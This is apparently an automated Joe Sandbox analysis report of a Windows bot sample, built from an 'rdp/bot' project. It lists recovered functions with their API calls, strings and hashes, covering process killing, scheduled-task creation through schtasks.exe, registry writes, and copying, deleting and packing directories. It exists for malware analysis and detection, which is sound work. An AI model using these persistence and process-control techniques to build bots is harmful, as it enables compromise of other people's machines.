(name != NULL) || (pid != 0), xrefs: 00007FFE1150B607
, xrefs: 00007FFE1150B687
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FFE1150B973
NULL, xrefs: 00007FFE1150BD42, 00007FFE1150BD4E
~, xrefs: 00007FFE1150B7D8
[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x), xrefs: 00007FFE1150B647
, xrefs: 00007FFE1150B774
[E] (%s) -> Process32First failed(gle=%lu), xrefs: 00007FFE1150B768
[I] (%s) -> Done(name=%s,pid=%lu), xrefs: 00007FFE1150BCEB
~, xrefs: 00007FFE1150B6C3
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FFE1150BB53
H:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FFE1150B600
P, xrefs: 00007FFE1150B7E1
P, xrefs: 00007FFE1150B6CC
[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu), xrefs: 00007FFE1150B67B
process_kill, xrefs: 00007FFE1150B60E, 00007FFE1150B640, 00007FFE1150B674, 00007FFE1150B761, 00007FFE1150B96C, 00007FFE1150BA05, 00007FFE1150BB4C, 00007FFE1150BCE4
[E] (%s) -> OpenProcess failed(gle=%lu), xrefs: 00007FFE1150BA0C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150B615
|, xrefs: 00007FFE1150B5F8

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$Process$CloseHandleOpenTerminatestrcmp
String ID: $ $(name != NULL) || (pid != 0)$H:/Projects/rdp/bot/codebase/process.c$NULL$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~
API String ID: 2412365107-3098527327
Opcode ID: 81c63815267f0c9c9996e2803d3dcf8c8ea940cf10da9261f995aa4587534c24
Instruction ID: 01693aef6b8132d6589491a053864fa4c5c485169682d7e1d027d2083ac98f33
Opcode Fuzzy Hash: 81c63815267f0c9c9996e2803d3dcf8c8ea940cf10da9261f995aa4587534c24
Instruction Fuzzy Hash: 86F16A59E0CE0386FB755F97A4C037D124DAF14375E6404BACA0E4A2F6EE6EAD849302

Function 00007FFE1150AB69 Relevance: 52.7, APIs: 11, Strings: 24, Instructions: 213stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1150ABDA
strlen.MSVCRT ref: 00007FFE1150AC3E
strncpy.MSVCRT ref: 00007FFE1150AC55
strlen.MSVCRT ref: 00007FFE1150AC5D
strlen.MSVCRT ref: 00007FFE1150AC6D
strncpy.MSVCRT ref: 00007FFE1150AC84
strlen.MSVCRT ref: 00007FFE1150AC8C
strlen.MSVCRT ref: 00007FFE1150AC9C
strcat.MSVCRT ref: 00007FFE1150AE05
strlen.MSVCRT ref: 00007FFE1150AE0D
strlen.MSVCRT ref: 00007FFE1150AE56

Part of subcall function 00007FFE11504E05: DeleteFileA.KERNEL32 ref: 00007FFE11504E1C

Strings

="Author, xrefs: 00007FFE1150ADB2
h, xrefs: 00007FFE1150AE97
"><Exec>, xrefs: 00007FFE1150ADBC
ommand>, xrefs: 00007FFE1150ADE0
%TEMP%, xrefs: 00007FFE1150AD29
[I] (%s) -> Done(config_path=%s), xrefs: 00007FFE1150AFA6
(config_path != NULL), xrefs: 00007FFE1150ABF4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150AC02
/xml, xrefs: 00007FFE1150AEC8
<Exec><C, xrefs: 00007FFE1150ADD6
[E] (%s) -> Failed(config_path=%s,err=%08x), xrefs: 00007FFE1150ACFA
/create, xrefs: 00007FFE1150AEED
></Actio, xrefs: 00007FFE1150AE30
d></Exec, xrefs: 00007FFE1150AE1F
sk>, xrefs: 00007FFE1150AE4C
NULL, xrefs: 00007FFE1150AF90
Context, xrefs: 00007FFE1150AD98
schtasks.exe, xrefs: 00007FFE1150AEF9
schtasks_create, xrefs: 00007FFE1150ABFB, 00007FFE1150ACF3, 00007FFE1150AF9F
<Actions, xrefs: 00007FFE1150AD8E
H:/Projects/rdp/bot/program-manager/schtasks.c, xrefs: 00007FFE1150ABED
/tn, xrefs: 00007FFE1150AEE1
ns></Tas, xrefs: 00007FFE1150AE3A
</Comman, xrefs: 00007FFE1150AE15

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$strncpy$DeleteFilestrcat
String ID: Context$"><Exec>$%TEMP%$(config_path != NULL)$/create$/tn$/xml$</Comman$<Actions$<Exec><C$="Author$></Actio$H:/Projects/rdp/bot/program-manager/schtasks.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(config_path=%s,err=%08x)$[I] (%s) -> Done(config_path=%s)$d></Exec$h$ns></Tas$ommand>$schtasks.exe$schtasks_create$sk>
API String ID: 329028095-661211825
Opcode ID: 9d2b95ecedeef79ef940029952d43e491f4449009400689515876598c96c059c
Instruction ID: 4ee89550025b6e8517ccb58e7ec47c4f1aa68b4bf3789db0836dce61f2513890
Opcode Fuzzy Hash: 9d2b95ecedeef79ef940029952d43e491f4449009400689515876598c96c059c
Instruction Fuzzy Hash: 42A1AF72A08F8782EB218B56E4503EE7799EB84794F804179DA4D477B5EF7CD609CB00

Function 00007FF76A9032E7 Relevance: 49.3, APIs: 16, Strings: 12, Instructions: 270stringCOMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 00007FF76A903342
strlen.MSVCRT ref: 00007FF76A90334A
strlen.MSVCRT ref: 00007FF76A90336B
strlen.MSVCRT ref: 00007FF76A90337D
strcmp.MSVCRT ref: 00007FF76A903425
strcmp.MSVCRT ref: 00007FF76A90343D
_mbscat.MSVCRT ref: 00007FF76A90349D
strlen.MSVCRT ref: 00007FF76A9034A5
_mbscpy.MSVCRT ref: 00007FF76A90358B
strlen.MSVCRT ref: 00007FF76A903593
strlen.MSVCRT ref: 00007FF76A9035B5
_mbscat.MSVCRT ref: 00007FF76A9035CE
_mbscpy.MSVCRT ref: 00007FF76A9035E1
strlen.MSVCRT ref: 00007FF76A9035E9
strlen.MSVCRT ref: 00007FF76A90360B
_mbscat.MSVCRT ref: 00007FF76A903627

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A903503, 00007FF76A90352E
NULL, xrefs: 00007FF76A9037DF, 00007FF76A9037E8
*, xrefs: 00007FF76A903382
[I] (%s) -> Filtered(f_src=%s,flt=%s), xrefs: 00007FF76A9034D5
(src != NULL), xrefs: 00007FF76A9034F5
(dst != NULL), xrefs: 00007FF76A903520
[D] (%s) -> Copy(f_src=%s,f_dst=%s), xrefs: 00007FF76A903641
[E] (%s) -> Failed(src=%s,dst=%s,err=%08x), xrefs: 00007FF76A90378D
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A9034EE, 00007FF76A903519
|, xrefs: 00007FF76A9034AA
fs_dir_copy, xrefs: 00007FF76A9034CE, 00007FF76A9034FC, 00007FF76A903527, 00007FF76A90363A, 00007FF76A903786, 00007FF76A9037F7
[I] (%s) -> Done(src=%s,dst=%s), xrefs: 00007FF76A9037FE

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen$_mbscat_mbscpy$strcmp
String ID: (dst != NULL)$(src != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
API String ID: 4213218670-1088979775
Opcode ID: 43c909b6f149e1d1df8258286fda8d50e1f0b48b3360d2dda5985ab33cba4aca
Instruction ID: d1aaa01238ba030b176c8042fd930fbcc90692fe95d43322cfa8d68e34173347
Opcode Fuzzy Hash: 43c909b6f149e1d1df8258286fda8d50e1f0b48b3360d2dda5985ab33cba4aca
Instruction Fuzzy Hash: 0CC1B261A0C782D5FA20A725A4847FBE652AB853C8FF400BADA4DC76C9DF7CE505C720

Function 00007FF76A907D26 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 268stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF76A907D57
strlen.MSVCRT ref: 00007FF76A907EB7

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF76A90808F, 00007FF76A908125
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A907E3B, 00007FF76A907E6B, 00007FF76A907E9E
H:/Projects/rdp/bot/codebase/package.c, xrefs: 00007FF76A907E26, 00007FF76A907E56, 00007FF76A907E89
[I] (%s) -> Done(package=%s,entry=%s), xrefs: 00007FF76A9081CD
(strlen(entry) <= 0xff), xrefs: 00007FF76A907E90
NULL, xrefs: 00007FF76A9081A8, 00007FF76A9081B4
%TEMP%, xrefs: 00007FF76A908001
mem_alloc, xrefs: 00007FF76A908088, 00007FF76A90811E
(entry != NULL), xrefs: 00007FF76A907E5D
(package != NULL), xrefs: 00007FF76A907E2D
[E] (%s) -> Failed to read the package file(package=%s,entry=%s,err=%08x), xrefs: 00007FF76A907F68
[E] (%s) -> Failed(package=%s,entry=%s,err=%08x), xrefs: 00007FF76A907DFC
[E] (%s) -> Failed to read the entry file(package=%s,entry=%s,err=%08x), xrefs: 00007FF76A907DBE
package_pack, xrefs: 00007FF76A907DB7, 00007FF76A907DF5, 00007FF76A907E34, 00007FF76A907E64, 00007FF76A907E97, 00007FF76A907F61, 00007FF76A9081C6

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen
String ID: %TEMP%$(entry != NULL)$(package != NULL)$(strlen(entry) <= 0xff)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed to read the entry file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed to read the package file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed(package=%s,entry=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(package=%s,entry=%s)$mem_alloc$package_pack
API String ID: 39653677-2518748746
Opcode ID: 6464d3d9d7d0ee37c4e9d6bf35cab73f2c3b7019d297de13f51eb0007bd82d43
Instruction ID: 2ee85edd6082564a9ba6e79e97d2d0b05caf152225bed5c1f2578a7981ee11e7
Opcode Fuzzy Hash: 6464d3d9d7d0ee37c4e9d6bf35cab73f2c3b7019d297de13f51eb0007bd82d43
Instruction Fuzzy Hash: 67C16E61A0CB46D6FA51BB15E4403BAF761BB447C8FE040B9EA4D87695EF3CE909C720

Function 00007FF76A902CA9 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF76A902CCE
RemoveDirectoryA.KERNEL32 ref: 00007FF76A902CE6
GetLastError.KERNEL32 ref: 00007FF76A902CF0

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

_mbscpy.MSVCRT ref: 00007FF76A902DBA
strlen.MSVCRT ref: 00007FF76A902DC2
strlen.MSVCRT ref: 00007FF76A902DDE
strlen.MSVCRT ref: 00007FF76A902DEF
_mbscpy.MSVCRT ref: 00007FF76A902E09
strlen.MSVCRT ref: 00007FF76A902E11
strlen.MSVCRT ref: 00007FF76A902E33
strlen.MSVCRT ref: 00007FF76A902E47
strcmp.MSVCRT ref: 00007FF76A902E89
strcmp.MSVCRT ref: 00007FF76A902E9C
RemoveDirectoryA.KERNEL32 ref: 00007FF76A902F45
GetLastError.KERNEL32 ref: 00007FF76A902F53

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A902D39
NULL, xrefs: 00007FF76A90308D
(path != NULL), xrefs: 00007FF76A902D2B
[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF76A902D0E, 00007FF76A902F71
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF76A9030A3
*, xrefs: 00007FF76A902DF4
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A902D24
[D] (%s) -> Delete(path_wc=%s,f_path=%s), xrefs: 00007FF76A902EBC
fs_dir_delete, xrefs: 00007FF76A902D07, 00007FF76A902D32, 00007FF76A902EB5, 00007FF76A902F6A, 00007FF76A903039, 00007FF76A90309C
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF76A903040

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen$DirectoryErrorLastRemove_mbscpystrcmp$fflushfwrite
String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
API String ID: 1390976747-812936415
Opcode ID: 244a59a808a88d46dd88935c991242beef01adb72226dff1f40ab65060197119
Instruction ID: a87375f0420ce9b34f78c6259f4d49a76c9533fa49b9299f7762c09e3d6dad23
Opcode Fuzzy Hash: 244a59a808a88d46dd88935c991242beef01adb72226dff1f40ab65060197119
Instruction Fuzzy Hash: F0A1B121A0D782D5FB20BB1494443BAE3A1AF863C5FF440BAC64DC7695EF7CE9498720

Function 00007FFE11504FC9 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE11504FEE
RemoveDirectoryA.KERNEL32 ref: 00007FFE11505006
GetLastError.KERNEL32 ref: 00007FFE11505010

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

strcpy.MSVCRT ref: 00007FFE115050DA
strlen.MSVCRT ref: 00007FFE115050E2
strlen.MSVCRT ref: 00007FFE115050FE
strlen.MSVCRT ref: 00007FFE1150510F
strcpy.MSVCRT ref: 00007FFE11505129
strlen.MSVCRT ref: 00007FFE11505131
strlen.MSVCRT ref: 00007FFE11505153
strlen.MSVCRT ref: 00007FFE11505167
strcmp.MSVCRT ref: 00007FFE115051A9
strcmp.MSVCRT ref: 00007FFE115051BC
RemoveDirectoryA.KERNEL32 ref: 00007FFE11505265
GetLastError.KERNEL32 ref: 00007FFE11505273

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11505059
[D] (%s) -> Delete(path_wc=%s,f_path=%s), xrefs: 00007FFE115051DC
[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE1150502E, 00007FFE11505291
fs_dir_delete, xrefs: 00007FFE11505027, 00007FFE11505052, 00007FFE115051D5, 00007FFE1150528A, 00007FFE11505359, 00007FFE115053BC
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE11505360
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE115053C3
NULL, xrefs: 00007FFE115053AD
(path != NULL), xrefs: 00007FFE1150504B
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11505044
*, xrefs: 00007FFE11505114

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
API String ID: 2460052984-812936415
Opcode ID: 00ae393095fadf1139cbb586ec39620cd26178d760d8a9428a3a12c53d054faa
Instruction ID: 0e53b61afe8425d82f9d1b27b0f3251cb2f4610c73cc3940f41634f63fdbe6ad
Opcode Fuzzy Hash: 00ae393095fadf1139cbb586ec39620cd26178d760d8a9428a3a12c53d054faa
Instruction Fuzzy Hash: 15A1E561A1CF8382F7218B97E4443FD635AAF813A8F9400BAD94D476B5DF7CE5498B01

Function 00007FFE11505607 Relevance: 42.3, APIs: 16, Strings: 12, Instructions: 270stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 00007FFE11505662
strlen.MSVCRT ref: 00007FFE1150566A
strlen.MSVCRT ref: 00007FFE1150568B
strlen.MSVCRT ref: 00007FFE1150569D
strcmp.MSVCRT ref: 00007FFE11505745
strcmp.MSVCRT ref: 00007FFE1150575D
strcat.MSVCRT ref: 00007FFE115057BD
strlen.MSVCRT ref: 00007FFE115057C5
strcpy.MSVCRT ref: 00007FFE115058AB
strlen.MSVCRT ref: 00007FFE115058B3
strlen.MSVCRT ref: 00007FFE115058D5
strcat.MSVCRT ref: 00007FFE115058EE
strcpy.MSVCRT ref: 00007FFE11505901
strlen.MSVCRT ref: 00007FFE11505909
strlen.MSVCRT ref: 00007FFE1150592B
strcat.MSVCRT ref: 00007FFE11505947

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11505823, 00007FFE1150584E
[I] (%s) -> Filtered(f_src=%s,flt=%s), xrefs: 00007FFE115057F5
[D] (%s) -> Copy(f_src=%s,f_dst=%s), xrefs: 00007FFE11505961
(dst != NULL), xrefs: 00007FFE11505840
[I] (%s) -> Done(src=%s,dst=%s), xrefs: 00007FFE11505B1E
NULL, xrefs: 00007FFE11505AFF, 00007FFE11505B08
fs_dir_copy, xrefs: 00007FFE115057EE, 00007FFE1150581C, 00007FFE11505847, 00007FFE1150595A, 00007FFE11505AA6, 00007FFE11505B17
*, xrefs: 00007FFE115056A2
[E] (%s) -> Failed(src=%s,dst=%s,err=%08x), xrefs: 00007FFE11505AAD
(src != NULL), xrefs: 00007FFE11505815
|, xrefs: 00007FFE115057CA
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1150580E, 00007FFE11505839

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$strcatstrcpy$strcmp
String ID: (dst != NULL)$(src != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
API String ID: 2140730755-1088979775
Opcode ID: 6415cd7427ca7030dcfbccfaa3fa58744746782daadf4cd84f294226e7070e12
Instruction ID: 12551726f46f41d2cb3f1b3a0a5e37315d5ed9a129a71dca8f2eff98402c686f
Opcode Fuzzy Hash: 6415cd7427ca7030dcfbccfaa3fa58744746782daadf4cd84f294226e7070e12
Instruction Fuzzy Hash: DFC1F561A1CE83C1FB218B57A5803FD635AAF453A8F9440BADA4D076B5DF7CE549C700

Function 00007FFE115060A1 Relevance: 36.9, APIs: 5, Strings: 16, Instructions: 199fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FFE115060F9
LockFileEx.KERNEL32 ref: 00007FFE11506132
GetLastError.KERNEL32 ref: 00007FFE11506207
GetLastError.KERNEL32 ref: 00007FFE115062EC
CloseHandle.KERNEL32 ref: 00007FFE11506460

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115061C1, 00007FFE115061F1
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FFE11506484
~, xrefs: 00007FFE1150636D
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1150618D
(lock != NULL), xrefs: 00007FFE115061E3
[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FFE11506301
P, xrefs: 00007FFE11506376
~, xrefs: 00007FFE11506288
, xrefs: 00007FFE1150630D
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115061AC, 00007FFE115061DC
P, xrefs: 00007FFE11506291
NULL, xrefs: 00007FFE1150646B
(path != NULL), xrefs: 00007FFE115061B3
[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FFE1150621C
fs_file_lock, xrefs: 00007FFE11506186, 00007FFE115061BA, 00007FFE115061EA, 00007FFE11506215, 00007FFE115062FA, 00007FFE1150647D
, xrefs: 00007FFE11506228

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: $ $(lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$~$~
API String ID: 2747014929-2799703827
Opcode ID: 8a1f087a5b44e938cbc2bf28125e5d566350832f0ac745bc4e0023e973acce87
Instruction ID: df8e594e3bdffa7b6b7ae2adee9756336d6deaa07bd49c41441bbb561d443b08
Opcode Fuzzy Hash: 8a1f087a5b44e938cbc2bf28125e5d566350832f0ac745bc4e0023e973acce87
Instruction Fuzzy Hash: D7816750D0CF4B82F771AB96E44037C325A5F01378F6441BAC96E076F2EE6DA9858362

Function 00007FF76A905E29 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 201registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF76A905E63
RegSetValueExA.ADVAPI32 ref: 00007FF76A905F8C
RegCloseKey.ADVAPI32 ref: 00007FF76A9060B5

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF76A905F49
P, xrefs: 00007FF76A90613A
, xrefs: 00007FF76A905E90
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A9060D5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A905ED9, 00007FF76A905F09
[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FF76A905FBA
, xrefs: 00007FF76A905FCF
P, xrefs: 00007FF76A906040
registry_set_value, xrefs: 00007FF76A905E7D, 00007FF76A905ED2, 00007FF76A905F02, 00007FF76A905F42, 00007FF76A905FB3, 00007FF76A9060CE
P, xrefs: 00007FF76A906037
(key != NULL), xrefs: 00007FF76A905EFB
NULL, xrefs: 00007FF76A905FE6, 00007FF76A90619F, 00007FF76A9061AB
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF76A905E84
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF76A905EC4, 00007FF76A905EF4
, xrefs: 00007FF76A905EA1
(root != NULL), xrefs: 00007FF76A905ECB
, xrefs: 00007FF76A905FC6

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

